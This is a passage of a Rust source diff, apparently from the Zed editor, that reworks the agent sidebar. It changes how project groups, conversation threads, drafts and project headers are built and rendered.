&mut Context>, + agent_panel: &Entity, + window: &mut Window, + cx: &mut Context, ) { - self.selected_index = ix; + cx.subscribe_in( + agent_panel, + window, + |this, agent_panel, event: &AgentPanelEvent, _window, cx| match event { + AgentPanelEvent::ActiveViewChanged => { + let is_new_draft = agent_panel + .read(cx) + .active_conversation_view() + .is_some_and(|cv| cv.read(cx).parent_id(cx).is_none()); + if is_new_draft { + if let Some(active_workspace) = this + .multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()) + { + this.active_entry = Some(ActiveEntry::Draft(active_workspace)); + } + } + this.observe_draft_editor(cx); + this.update_entries(cx); + } + AgentPanelEvent::ThreadFocused | AgentPanelEvent::BackgroundThreadChanged => { + this.update_entries(cx); + } + AgentPanelEvent::MessageSentOrQueued { session_id } => { + this.record_thread_message_sent(session_id); + this.update_entries(cx); + } + }, + ) + .detach(); } - fn can_select( - &mut self, - ix: usize, - _window: &mut Window, - _cx: &mut Context>, - ) -> bool { - match self.matches.get(ix) { - Some(SidebarMatch { - entry: SidebarEntry::Separator(_), - .. - }) => false, - _ => true, + fn observe_docks(&mut self, workspace: &Entity, cx: &mut Context) { + let docks: Vec<_> = workspace + .read(cx) + .all_docks() + .into_iter() + .cloned() + .collect(); + let workspace = workspace.downgrade(); + for dock in docks { + let workspace = workspace.clone(); + cx.observe(&dock, move |this, _dock, cx| { + let Some(workspace) = workspace.upgrade() else { + return; + }; + if !this.is_active_workspace(&workspace, cx) { + return; + } + + cx.notify(); + }) + .detach(); } } - fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { - "Search…".into() + fn observe_draft_editor(&mut self, cx: &mut Context) { + self._draft_observation = self + .multi_workspace + .upgrade() + .and_then(|mw| { + let ws = mw.read(cx).workspace(); + ws.read(cx).panel::(cx) + }) + .and_then(|panel| { + let cv = panel.read(cx).active_conversation_view()?; + let tv = cv.read(cx).active_thread()?; + Some(tv.read(cx).message_editor.clone()) + }) + .map(|editor| { + cx.observe(&editor, |_this, _editor, cx| { + cx.notify(); + }) + }); } - fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option { - if self.query.is_empty() { + fn active_draft_text(&self, cx: &App) -> Option { + let mw = self.multi_workspace.upgrade()?; + let workspace = mw.read(cx).workspace(); + let panel = workspace.read(cx).panel::(cx)?; + let conversation_view = panel.read(cx).active_conversation_view()?; + let thread_view = conversation_view.read(cx).active_thread()?; + let raw = thread_view.read(cx).message_editor.read(cx).text(cx); + let cleaned = Self::clean_mention_links(&raw); + let mut text: String = cleaned.split_whitespace().collect::>().join(" "); + if text.is_empty() { None } else { - Some("No threads match your search.".into()) + const MAX_CHARS: usize = 250; + if let Some((truncate_at, _)) = text.char_indices().nth(MAX_CHARS) { + text.truncate(truncate_at); + } + Some(text.into()) } } - fn update_matches( - &mut self, - query: String, - window: &mut Window, - cx: &mut Context>, - ) -> Task<()> { - let query_changed = self.query != query; - self.query = query.clone(); - if query_changed { - self.hovered_thread_item = None; - } - let entries = self.entries.clone(); - - if query.is_empty() { - self.matches = entries - .into_iter() - .map(|entry| SidebarMatch { - entry, - positions: Vec::new(), - }) - .collect(); - - let separator_offset = if self.workspace_thread_count > 0 { - 1 - } else { - 0 - }; - self.selected_index = (self.active_workspace_index + separator_offset) - .min(self.matches.len().saturating_sub(1)); - return Task::ready(()); + fn clean_mention_links(input: &str) -> String { + let mut result = String::with_capacity(input.len()); + let mut remaining = input; + + while let Some(start) = remaining.find("[@") { + result.push_str(&remaining[..start]); + let after_bracket = &remaining[start + 1..]; // skip '[' + if let Some(close_bracket) = after_bracket.find("](") { + let mention = &after_bracket[..close_bracket]; // "@something" + let after_link_start = &after_bracket[close_bracket + 2..]; // after "](" + if let Some(close_paren) = after_link_start.find(')') { + result.push_str(mention); + remaining = &after_link_start[close_paren + 1..]; + continue; + } + } + // Couldn't parse full link syntax — emit the literal "[@" and move on. + result.push_str("[@"); + remaining = &remaining[start + 2..]; } + result.push_str(remaining); + result + } - let executor = cx.background_executor().clone(); - cx.spawn_in(window, async move |picker, cx| { - let matches = cx - .background_spawn(async move { - let data_entries: Vec<(usize, &SidebarEntry)> = entries - .iter() - .enumerate() - .filter(|(_, entry)| !matches!(entry, SidebarEntry::Separator(_))) - .collect(); - - let candidates: Vec = data_entries - .iter() - .enumerate() - .map(|(candidate_index, (_, entry))| { - StringMatchCandidate::new(candidate_index, entry.searchable_text()) - }) - .collect(); - - let search_matches = fuzzy::match_strings( - &candidates, - &query, - false, - true, - MAX_MATCHES, - &Default::default(), - executor, - ) - .await; - - let mut workspace_matches = Vec::new(); - let mut project_matches = Vec::new(); - - for search_match in search_matches { - let (original_index, _) = data_entries[search_match.candidate_id]; - let entry = entries[original_index].clone(); - let sidebar_match = SidebarMatch { - positions: search_match.positions, - entry: entry.clone(), - }; - match entry { - SidebarEntry::WorkspaceThread(_) => { - workspace_matches.push(sidebar_match) - } - SidebarEntry::RecentProject(_) => project_matches.push(sidebar_match), - SidebarEntry::Separator(_) => {} - } - } + /// Finds an open workspace whose project group key matches the given path list. + fn workspace_for_group(&self, path_list: &PathList, cx: &App) -> Option> { + let mw = self.multi_workspace.upgrade()?; + let mw = mw.read(cx); + mw.workspaces() + .find(|ws| ws.read(cx).project_group_key(cx).path_list() == path_list) + .cloned() + } - let mut result = Vec::new(); - if !workspace_matches.is_empty() { - result.push(SidebarMatch { - entry: SidebarEntry::Separator("Active Workspaces".into()), - positions: Vec::new(), - }); - result.extend(workspace_matches); - } - if !project_matches.is_empty() { - result.push(SidebarMatch { - entry: SidebarEntry::Separator("Recent Projects".into()), - positions: Vec::new(), - }); - result.extend(project_matches); - } - result - }) - .await; + /// Opens a new workspace for a group that has no open workspaces. + fn open_workspace_for_group( + &mut self, + path_list: &PathList, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; - picker - .update_in(cx, |picker, _window, _cx| { - picker.delegate.matches = matches; - if picker.delegate.matches.is_empty() { - picker.delegate.selected_index = 0; - } else { - let first_selectable = picker - .delegate - .matches - .iter() - .position(|m| !matches!(m.entry, SidebarEntry::Separator(_))) - .unwrap_or(0); - picker.delegate.selected_index = first_selectable; - } - }) - .log_err(); - }) + multi_workspace + .update(cx, |this, cx| { + this.find_or_create_local_workspace(path_list.clone(), window, cx) + }) + .detach_and_log_err(cx); } - fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context>) { - let Some(selected_match) = self.matches.get(self.selected_index) else { + /// Rebuilds the sidebar contents from current workspace and thread state. + /// + /// Iterates [`MultiWorkspace::project_group_keys`] to determine project + /// groups, then populates thread entries from the metadata store and + /// merges live thread info from active agent panels. + /// + /// Aim for a single forward pass over workspaces and threads plus an + /// O(T log T) sort. Avoid adding extra scans over the data. + /// + /// Properties: + /// + /// - Should always show every workspace in the multiworkspace + /// - If you have no threads, and two workspaces for the worktree and the main workspace, make sure at least one is shown + /// - Should always show every thread, associated with each workspace in the multiworkspace + /// - After every build_contents, our "active" state should exactly match the current workspace's, current agent panel's current thread. + fn rebuild_contents(&mut self, cx: &App) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { return; }; - - match &selected_match.entry { - SidebarEntry::Separator(_) => {} - SidebarEntry::WorkspaceThread(thread_entry) => { - let target_index = thread_entry.index; - self.multi_workspace.update(cx, |multi_workspace, cx| { - multi_workspace.activate_index(target_index, window, cx); - }); - } - SidebarEntry::RecentProject(project_entry) => { - let paths = project_entry.paths.clone(); - open_recent_project(paths, window, cx); + let mw = multi_workspace.read(cx); + let workspaces: Vec<_> = mw.workspaces().cloned().collect(); + let active_workspace = Some(mw.workspace().clone()); + + let agent_server_store = workspaces + .first() + .map(|ws| ws.read(cx).project().read(cx).agent_server_store().clone()); + + let query = self.filter_editor.read(cx).text(cx); + + // Derive active_entry from the active workspace's agent panel. + // Draft is checked first because a conversation can have a session_id + // before any messages are sent. However, a thread that's still loading + // also appears as a "draft" (no messages yet). + if let Some(active_ws) = &active_workspace { + if let Some(panel) = active_ws.read(cx).panel::(cx) { + if panel.read(cx).active_thread_is_draft(cx) + || panel.read(cx).active_conversation_view().is_none() + { + let conversation_parent_id = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)); + let preserving_thread = + if let Some(ActiveEntry::Thread { session_id, .. }) = &self.active_entry { + self.active_entry_workspace() == Some(active_ws) + && conversation_parent_id + .as_ref() + .is_some_and(|id| id == session_id) + } else { + false + }; + if !preserving_thread { + self.active_entry = Some(ActiveEntry::Draft(active_ws.clone())); + } + } else if let Some(session_id) = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)) + { + self.active_entry = Some(ActiveEntry::Thread { + session_id, + workspace: active_ws.clone(), + }); + } + // else: conversation exists, not a draft, but no session_id + // yet — thread is mid-load. Keep previous value. } } - } - fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + let previous = mem::take(&mut self.contents); - fn render_match( - &self, - index: usize, - selected: bool, - _window: &mut Window, - cx: &mut Context>, - ) -> Option { - let match_entry = self.matches.get(index)?; - let SidebarMatch { entry, positions } = match_entry; + let old_statuses: HashMap = previous + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::Thread(thread) if thread.is_live => { + Some((thread.metadata.session_id.clone(), thread.status)) + } + _ => None, + }) + .collect(); - match entry { - SidebarEntry::Separator(title) => Some( - v_flex() - .when(index > 0, |this| { - this.mt_1() - .gap_2() - .child(Divider::horizontal().color(DividerColor::BorderFaded)) - }) - .child(ListSubHeader::new(title.clone()).inset(true)) - .into_any_element(), - ), - SidebarEntry::WorkspaceThread(thread_entry) => { - let worktree_label = thread_entry.worktree_label.clone(); - let full_path = thread_entry.full_path.clone(); - let thread_info = thread_entry.thread_info.clone(); - let workspace_index = thread_entry.index; - let multi_workspace = self.multi_workspace.clone(); - let workspace_count = self.multi_workspace.read(cx).workspaces().len(); - let is_hovered = self.hovered_thread_item == Some(workspace_index); - - let remove_btn = IconButton::new( - format!("remove-workspace-{}", workspace_index), - IconName::Close, - ) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .tooltip(Tooltip::text("Remove Workspace")) - .on_click({ - let multi_workspace = multi_workspace; - move |_, window, cx| { - multi_workspace.update(cx, |mw, cx| { - mw.remove_workspace(workspace_index, window, cx); - }); + let mut entries = Vec::new(); + let mut notified_threads = previous.notified_threads; + let mut current_session_ids: HashSet = HashSet::new(); + let mut project_header_indices: Vec = Vec::new(); + + let has_open_projects = workspaces + .iter() + .any(|ws| !workspace_path_list(ws, cx).paths().is_empty()); + + let resolve_agent_icon = |agent_id: &AgentId| -> (IconName, Option) { + let agent = Agent::from(agent_id.clone()); + let icon = match agent { + Agent::NativeAgent => IconName::ZedAgent, + Agent::Custom { .. } => IconName::Terminal, + }; + let icon_from_external_svg = agent_server_store + .as_ref() + .and_then(|store| store.read(cx).agent_icon(&agent_id)); + (icon, icon_from_external_svg) + }; + + for (group_key, group_workspaces) in mw.project_groups(cx) { + let path_list = group_key.path_list().clone(); + if path_list.paths().is_empty() { + continue; + } + + let label = group_key.display_name(); + + let is_collapsed = self.collapsed_groups.contains(&path_list); + let should_load_threads = !is_collapsed || !query.is_empty(); + + let is_active = active_workspace + .as_ref() + .is_some_and(|active| group_workspaces.contains(active)); + + // Collect live thread infos from all workspaces in this group. + let live_infos: Vec<_> = group_workspaces + .iter() + .flat_map(|ws| all_thread_infos_for_workspace(ws, cx)) + .collect(); + + let mut threads: Vec = Vec::new(); + let mut has_running_threads = false; + let mut waiting_thread_count: usize = 0; + + if should_load_threads { + let mut seen_session_ids: HashSet = HashSet::new(); + let thread_store = ThreadMetadataStore::global(cx); + + // Build a lookup from workspace root paths to their workspace + // entity, used to assign ThreadEntryWorkspace::Open for threads + // whose folder_paths match an open workspace. + let workspace_by_path_list: HashMap> = + group_workspaces + .iter() + .map(|ws| (workspace_path_list(ws, cx), ws)) + .collect(); + + // Resolve a ThreadEntryWorkspace for a thread row. If any open + // workspace's root paths match the thread's folder_paths, use + // Open; otherwise use Closed. + let resolve_workspace = |row: &ThreadMetadata| -> ThreadEntryWorkspace { + workspace_by_path_list + .get(&row.folder_paths) + .map(|ws| ThreadEntryWorkspace::Open((*ws).clone())) + .unwrap_or_else(|| ThreadEntryWorkspace::Closed(row.folder_paths.clone())) + }; + + // Build a ThreadEntry from a metadata row. + let make_thread_entry = |row: ThreadMetadata, + workspace: ThreadEntryWorkspace| + -> ThreadEntry { + let (icon, icon_from_external_svg) = resolve_agent_icon(&row.agent_id); + let worktrees = worktree_info_from_thread_paths(&row.folder_paths, &group_key); + ThreadEntry { + metadata: row, + icon, + icon_from_external_svg, + status: AgentThreadStatus::default(), + workspace, + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees, + diff_stats: DiffStats::default(), + } + }; + + // === Main code path: one query per group via main_worktree_paths === + // The main_worktree_paths column is set on all new threads and + // points to the group's canonical paths regardless of which + // linked worktree the thread was opened in. + for row in thread_store + .read(cx) + .entries_for_main_worktree_path(&path_list) + .cloned() + { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + let workspace = resolve_workspace(&row); + threads.push(make_thread_entry(row, workspace)); + } + + // Legacy threads did not have `main_worktree_paths` populated, so they + // must be queried by their `folder_paths`. + + // Load any legacy threads for the main worktrees of this project group. + for row in thread_store.read(cx).entries_for_path(&path_list).cloned() { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + let workspace = resolve_workspace(&row); + threads.push(make_thread_entry(row, workspace)); + } + + // Load any legacy threads for any single linked wortree of this project group. + let mut linked_worktree_paths = HashSet::new(); + for workspace in &group_workspaces { + if workspace.read(cx).visible_worktrees(cx).count() != 1 { + continue; + } + for snapshot in root_repository_snapshots(workspace, cx) { + for linked_worktree in snapshot.linked_worktrees() { + linked_worktree_paths.insert(linked_worktree.path.clone()); + } + } + } + for path in linked_worktree_paths { + let worktree_path_list = PathList::new(std::slice::from_ref(&path)); + for row in thread_store + .read(cx) + .entries_for_path(&worktree_path_list) + .cloned() + { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + threads.push(make_thread_entry( + row, + ThreadEntryWorkspace::Closed(worktree_path_list.clone()), + )); + } + } + + // Build a lookup from live_infos and compute running/waiting + // counts in a single pass. + let mut live_info_by_session: HashMap<&acp::SessionId, &ActiveThreadInfo> = + HashMap::new(); + for info in &live_infos { + live_info_by_session.insert(&info.session_id, info); + if info.status == AgentThreadStatus::Running { + has_running_threads = true; + } + if info.status == AgentThreadStatus::WaitingForConfirmation { + waiting_thread_count += 1; + } + } + + // Merge live info into threads and update notification state + // in a single pass. + for thread in &mut threads { + if let Some(info) = live_info_by_session.get(&thread.metadata.session_id) { + thread.apply_active_info(info); + } + + let session_id = &thread.metadata.session_id; + + let is_active_thread = self.active_entry.as_ref().is_some_and(|entry| { + entry.is_active_thread(session_id) + && active_workspace + .as_ref() + .is_some_and(|active| active == entry.workspace()) + }); + + if thread.status == AgentThreadStatus::Completed + && !is_active_thread + && old_statuses.get(session_id) == Some(&AgentThreadStatus::Running) + { + notified_threads.insert(session_id.clone()); + } + + if is_active_thread && !thread.is_background { + notified_threads.remove(session_id); + } + } + + threads.sort_by(|a, b| { + let a_time = self + .thread_last_message_sent_or_queued + .get(&a.metadata.session_id) + .copied() + .or(a.metadata.created_at) + .or(Some(a.metadata.updated_at)); + let b_time = self + .thread_last_message_sent_or_queued + .get(&b.metadata.session_id) + .copied() + .or(b.metadata.created_at) + .or(Some(b.metadata.updated_at)); + b_time.cmp(&a_time) + }); + } else { + for info in live_infos { + if info.status == AgentThreadStatus::Running { + has_running_threads = true; + } + if info.status == AgentThreadStatus::WaitingForConfirmation { + waiting_thread_count += 1; } + } + } + + if !query.is_empty() { + let workspace_highlight_positions = + fuzzy_match_positions(&query, &label).unwrap_or_default(); + let workspace_matched = !workspace_highlight_positions.is_empty(); + + let mut matched_threads: Vec = Vec::new(); + for mut thread in threads { + let title: &str = &thread.metadata.title; + if let Some(positions) = fuzzy_match_positions(&query, title) { + thread.highlight_positions = positions; + } + let mut worktree_matched = false; + for worktree in &mut thread.worktrees { + if let Some(positions) = fuzzy_match_positions(&query, &worktree.name) { + worktree.highlight_positions = positions; + worktree_matched = true; + } + } + if workspace_matched + || !thread.highlight_positions.is_empty() + || worktree_matched + { + matched_threads.push(thread); + } + } + + if matched_threads.is_empty() && !workspace_matched { + continue; + } + + project_header_indices.push(entries.len()); + entries.push(ListEntry::ProjectHeader { + key: group_key.clone(), + label, + highlight_positions: workspace_highlight_positions, + has_running_threads, + waiting_thread_count, + is_active, }); - let has_notification = self.notified_workspaces.contains(&workspace_index); - let thread_subtitle = thread_info.as_ref().map(|info| info.title.clone()); - let status = thread_info - .as_ref() - .map_or(AgentThreadStatus::default(), |info| info.status); - let running = matches!( - status, - AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation - ); + for thread in matched_threads { + current_session_ids.insert(thread.metadata.session_id.clone()); + entries.push(thread.into()); + } + } else { + let is_draft_for_group = is_active + && matches!(&self.active_entry, Some(ActiveEntry::Draft(ws)) if group_workspaces.contains(ws)); + + project_header_indices.push(entries.len()); + entries.push(ListEntry::ProjectHeader { + key: group_key.clone(), + label, + highlight_positions: Vec::new(), + has_running_threads, + waiting_thread_count, + is_active, + }); - Some( - ThreadItem::new( - ("workspace-item", thread_entry.index), - thread_subtitle.unwrap_or("New Thread".into()), - ) - .icon( - thread_info + if is_collapsed { + continue; + } + + // Emit a DraftThread entry when the active draft belongs to this group. + if is_draft_for_group { + if let Some(ActiveEntry::Draft(draft_ws)) = &self.active_entry { + let ws_path_list = workspace_path_list(draft_ws, cx); + let worktrees = worktree_info_from_thread_paths(&ws_path_list, &group_key); + entries.push(ListEntry::DraftThread { worktrees }); + } + } + + // Emit a NewThread entry when: + // 1. The group has zero threads (convenient affordance). + // 2. The active workspace has linked worktrees but no threads + // for the active workspace's specific set of worktrees. + let group_has_no_threads = threads.is_empty() && !group_workspaces.is_empty(); + let active_ws_has_threadless_linked_worktrees = is_active + && !is_draft_for_group + && active_workspace.as_ref().is_some_and(|active_ws| { + let ws_path_list = workspace_path_list(active_ws, cx); + let has_linked_worktrees = + !worktree_info_from_thread_paths(&ws_path_list, &group_key).is_empty(); + if !has_linked_worktrees { + return false; + } + let thread_store = ThreadMetadataStore::global(cx); + let has_threads_for_ws = thread_store + .read(cx) + .entries_for_path(&ws_path_list) + .next() + .is_some() + || thread_store + .read(cx) + .entries_for_main_worktree_path(&ws_path_list) + .next() + .is_some(); + !has_threads_for_ws + }); + + if !is_draft_for_group + && (group_has_no_threads || active_ws_has_threadless_linked_worktrees) + { + let worktrees = if active_ws_has_threadless_linked_worktrees { + active_workspace .as_ref() - .map_or(IconName::ZedAgent, |info| info.icon), + .map(|ws| { + worktree_info_from_thread_paths( + &workspace_path_list(ws, cx), + &group_key, + ) + }) + .unwrap_or_default() + } else { + Vec::new() + }; + entries.push(ListEntry::NewThread { + key: group_key.clone(), + worktrees, + }); + } + + let total = threads.len(); + + let extra_batches = self.expanded_groups.get(&path_list).copied().unwrap_or(0); + let threads_to_show = + DEFAULT_THREADS_SHOWN + (extra_batches * DEFAULT_THREADS_SHOWN); + let count = threads_to_show.min(total); + + let mut promoted_threads: HashSet = HashSet::new(); + + // Build visible entries in a single pass. Threads within + // the cutoff are always shown. Threads beyond it are shown + // only if they should be promoted (running, waiting, or + // focused) + for (index, thread) in threads.into_iter().enumerate() { + let is_hidden = index >= count; + + let session_id = &thread.metadata.session_id; + if is_hidden { + let is_promoted = thread.status == AgentThreadStatus::Running + || thread.status == AgentThreadStatus::WaitingForConfirmation + || notified_threads.contains(session_id) + || self.active_entry.as_ref().is_some_and(|active| { + active.matches_entry(&ListEntry::Thread(thread.clone())) + }); + if is_promoted { + promoted_threads.insert(session_id.clone()); + } + if !promoted_threads.contains(session_id) { + continue; + } + } + + current_session_ids.insert(session_id.clone()); + entries.push(thread.into()); + } + + let visible = count + promoted_threads.len(); + let is_fully_expanded = visible >= total; + + if total > DEFAULT_THREADS_SHOWN { + entries.push(ListEntry::ViewMore { + key: group_key.clone(), + is_fully_expanded, + }); + } + } + } + + // Prune stale notifications using the session IDs we collected during + // the build pass (no extra scan needed). + notified_threads.retain(|id| current_session_ids.contains(id)); + + self.thread_last_accessed + .retain(|id, _| current_session_ids.contains(id)); + self.thread_last_message_sent_or_queued + .retain(|id, _| current_session_ids.contains(id)); + + self.contents = SidebarContents { + entries, + notified_threads, + project_header_indices, + has_open_projects, + }; + } + + /// Rebuilds the sidebar's visible entries from already-cached state. + fn update_entries(&mut self, cx: &mut Context) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + if !multi_workspace.read(cx).multi_workspace_enabled(cx) { + return; + } + + let had_notifications = self.has_notifications(cx); + let scroll_position = self.list_state.logical_scroll_top(); + + self.rebuild_contents(cx); + + self.list_state.reset(self.contents.entries.len()); + self.list_state.scroll_to(scroll_position); + + if had_notifications != self.has_notifications(cx) { + multi_workspace.update(cx, |_, cx| { + cx.notify(); + }); + } + + cx.notify(); + } + + fn select_first_entry(&mut self) { + self.selection = self + .contents + .entries + .iter() + .position(|entry| matches!(entry, ListEntry::Thread(_))) + .or_else(|| { + if self.contents.entries.is_empty() { + None + } else { + Some(0) + } + }); + } + + fn render_list_entry( + &mut self, + ix: usize, + window: &mut Window, + cx: &mut Context, + ) -> AnyElement { + let Some(entry) = self.contents.entries.get(ix) else { + return div().into_any_element(); + }; + let is_focused = self.focus_handle.is_focused(window); + // is_selected means the keyboard selector is here. + let is_selected = is_focused && self.selection == Some(ix); + + let is_group_header_after_first = + ix > 0 && matches!(entry, ListEntry::ProjectHeader { .. }); + + let is_active = self + .active_entry + .as_ref() + .is_some_and(|active| active.matches_entry(entry)); + + let rendered = match entry { + ListEntry::ProjectHeader { + key, + label, + highlight_positions, + has_running_threads, + waiting_thread_count, + is_active: is_active_group, + } => self.render_project_header( + ix, + false, + key, + label, + highlight_positions, + *has_running_threads, + *waiting_thread_count, + *is_active_group, + is_selected, + cx, + ), + ListEntry::Thread(thread) => self.render_thread(ix, thread, is_active, is_selected, cx), + ListEntry::ViewMore { + key, + is_fully_expanded, + } => self.render_view_more(ix, key.path_list(), *is_fully_expanded, is_selected, cx), + ListEntry::DraftThread { worktrees, .. } => { + self.render_draft_thread(ix, is_active, worktrees, is_selected, cx) + } + ListEntry::NewThread { key, worktrees, .. } => { + self.render_new_thread(ix, key, worktrees, is_selected, cx) + } + }; + + if is_group_header_after_first { + v_flex() + .w_full() + .border_t_1() + .border_color(cx.theme().colors().border) + .child(rendered) + .into_any_element() + } else { + rendered + } + } + + fn render_remote_project_icon( + &self, + ix: usize, + host: Option<&RemoteConnectionOptions>, + ) -> Option { + let remote_icon_per_type = match host? { + RemoteConnectionOptions::Wsl(_) => IconName::Linux, + RemoteConnectionOptions::Docker(_) => IconName::Box, + _ => IconName::Server, + }; + + Some( + div() + .id(format!("remote-project-icon-{}", ix)) + .child( + Icon::new(remote_icon_per_type) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + .tooltip(Tooltip::text("Remote Project")) + .into_any_element(), + ) + } + + fn render_project_header( + &self, + ix: usize, + is_sticky: bool, + key: &ProjectGroupKey, + label: &SharedString, + highlight_positions: &[usize], + has_running_threads: bool, + waiting_thread_count: usize, + is_active: bool, + is_focused: bool, + cx: &mut Context, + ) -> AnyElement { + let path_list = key.path_list(); + let host = key.host(); + + let id_prefix = if is_sticky { "sticky-" } else { "" }; + let id = SharedString::from(format!("{id_prefix}project-header-{ix}")); + let disclosure_id = SharedString::from(format!("disclosure-{ix}")); + let group_name = SharedString::from(format!("{id_prefix}header-group-{ix}")); + + let is_collapsed = self.collapsed_groups.contains(path_list); + let (disclosure_icon, disclosure_tooltip) = if is_collapsed { + (IconName::ChevronRight, "Expand Project") + } else { + (IconName::ChevronDown, "Collapse Project") + }; + + let has_new_thread_entry = self.contents.entries.get(ix + 1).is_some_and(|entry| { + matches!( + entry, + ListEntry::NewThread { .. } | ListEntry::DraftThread { .. } + ) + }); + let show_new_thread_button = !has_new_thread_entry && !self.has_filter_query(cx); + + let workspace = self.workspace_for_group(path_list, cx); + + let path_list_for_toggle = path_list.clone(); + let path_list_for_collapse = path_list.clone(); + let view_more_expanded = self.expanded_groups.contains_key(path_list); + + let label = if highlight_positions.is_empty() { + Label::new(label.clone()) + .when(!is_active, |this| this.color(Color::Muted)) + .into_any_element() + } else { + HighlightedLabel::new(label.clone(), highlight_positions.to_vec()) + .when(!is_active, |this| this.color(Color::Muted)) + .into_any_element() + }; + + let color = cx.theme().colors(); + let hover_color = color + .element_active + .blend(color.element_background.opacity(0.2)); + + h_flex() + .id(id) + .group(&group_name) + .h(Tab::content_height(cx)) + .w_full() + .pl(px(5.)) + .pr_1p5() + .border_1() + .map(|this| { + if is_focused { + this.border_color(color.border_focused) + } else { + this.border_color(gpui::transparent_black()) + } + }) + .justify_between() + .child( + h_flex() + .when(!is_active, |this| this.cursor_pointer()) + .relative() + .min_w_0() + .w_full() + .gap(px(5.)) + .child( + IconButton::new(disclosure_id, disclosure_icon) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.5))) + .tooltip(Tooltip::text(disclosure_tooltip)) + .on_click(cx.listener(move |this, _, window, cx| { + this.selection = None; + this.toggle_collapse(&path_list_for_toggle, window, cx); + })), + ) + .child(label) + .when_some( + self.render_remote_project_icon(ix, host.as_ref()), + |this, icon| this.child(icon), ) - .running(running) - .generation_done(has_notification) - .status(status) - .selected(selected) - .worktree(worktree_label.clone()) - .worktree_highlight_positions(positions.clone()) - .when(workspace_count > 1, |item| item.action_slot(remove_btn)) - .hovered(is_hovered) - .on_hover(cx.listener(move |picker, is_hovered, _window, cx| { - let mut changed = false; - if *is_hovered { - if picker.delegate.hovered_thread_item != Some(workspace_index) { - picker.delegate.hovered_thread_item = Some(workspace_index); - changed = true; + .when(is_collapsed, |this| { + this.when(has_running_threads, |this| { + this.child( + Icon::new(IconName::LoadCircle) + .size(IconSize::XSmall) + .color(Color::Muted) + .with_rotate_animation(2), + ) + }) + .when(waiting_thread_count > 0, |this| { + let tooltip_text = if waiting_thread_count == 1 { + "1 thread is waiting for confirmation".to_string() + } else { + format!( + "{waiting_thread_count} threads are waiting for confirmation", + ) + }; + this.child( + div() + .id(format!("{id_prefix}waiting-indicator-{ix}")) + .child( + Icon::new(IconName::Warning) + .size(IconSize::XSmall) + .color(Color::Warning), + ) + .tooltip(Tooltip::text(tooltip_text)), + ) + }) + }), + ) + .child( + h_flex() + .when(self.project_header_menu_ix != Some(ix), |this| { + this.visible_on_hover(group_name) + }) + .on_mouse_down(gpui::MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .child(self.render_project_header_menu(ix, id_prefix, key, cx)) + .when(view_more_expanded && !is_collapsed, |this| { + this.child( + IconButton::new( + SharedString::from(format!( + "{id_prefix}project-header-collapse-{ix}", + )), + IconName::ListCollapse, + ) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Collapse Displayed Threads")) + .on_click(cx.listener({ + let path_list_for_collapse = path_list_for_collapse.clone(); + move |this, _, _window, cx| { + this.selection = None; + this.expanded_groups.remove(&path_list_for_collapse); + this.serialize(cx); + this.update_entries(cx); + } + })), + ) + }) + .when_some( + workspace.filter(|_| show_new_thread_button), + |this, workspace| { + let path_list = path_list.clone(); + this.child( + IconButton::new( + SharedString::from(format!( + "{id_prefix}project-header-new-thread-{ix}", + )), + IconName::Plus, + ) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("New Thread")) + .on_click(cx.listener( + move |this, _, window, cx| { + this.collapsed_groups.remove(&path_list); + this.selection = None; + this.create_new_thread(&workspace, window, cx); + }, + )), + ) + }, + ), + ) + .when(!is_active, |this| { + let path_list = path_list.clone(); + this.cursor_pointer() + .hover(|s| s.bg(hover_color)) + .tooltip(Tooltip::text("Open Workspace")) + .on_click(cx.listener(move |this, _, window, cx| { + if let Some(workspace) = this.workspace_for_group(&path_list, cx) { + this.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + if let Some(multi_workspace) = this.multi_workspace.upgrade() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); } - } else if picker.delegate.hovered_thread_item == Some(workspace_index) { - picker.delegate.hovered_thread_item = None; - changed = true; - } - if changed { - cx.notify(); + if AgentPanel::is_visible(&workspace, cx) { + workspace.update(cx, |workspace, cx| { + workspace.focus_panel::(window, cx); + }); + } + } else { + this.open_workspace_for_group(&path_list, window, cx); } })) - .when(!full_path.is_empty(), |this| { - this.tooltip(move |_, cx| { - Tooltip::with_meta(worktree_label.clone(), None, full_path.clone(), cx) + }) + .into_any_element() + } + + fn render_project_header_menu( + &self, + ix: usize, + id_prefix: &str, + project_group_key: &ProjectGroupKey, + cx: &mut Context, + ) -> impl IntoElement { + let multi_workspace = self.multi_workspace.clone(); + let this = cx.weak_entity(); + let project_group_key = project_group_key.clone(); + + PopoverMenu::new(format!("{id_prefix}project-header-menu-{ix}")) + .on_open(Rc::new({ + let this = this.clone(); + move |_window, cx| { + this.update(cx, |sidebar, cx| { + sidebar.project_header_menu_ix = Some(ix); + cx.notify(); + }) + .ok(); + } + })) + .menu(move |window, cx| { + let multi_workspace = multi_workspace.clone(); + let project_group_key = project_group_key.clone(); + + let menu = ContextMenu::build_persistent(window, cx, move |menu, _window, cx| { + let mut menu = menu + .header("Project Folders") + .end_slot_action(Box::new(menu::EndSlot)); + + for path in project_group_key.path_list().paths() { + let Some(name) = 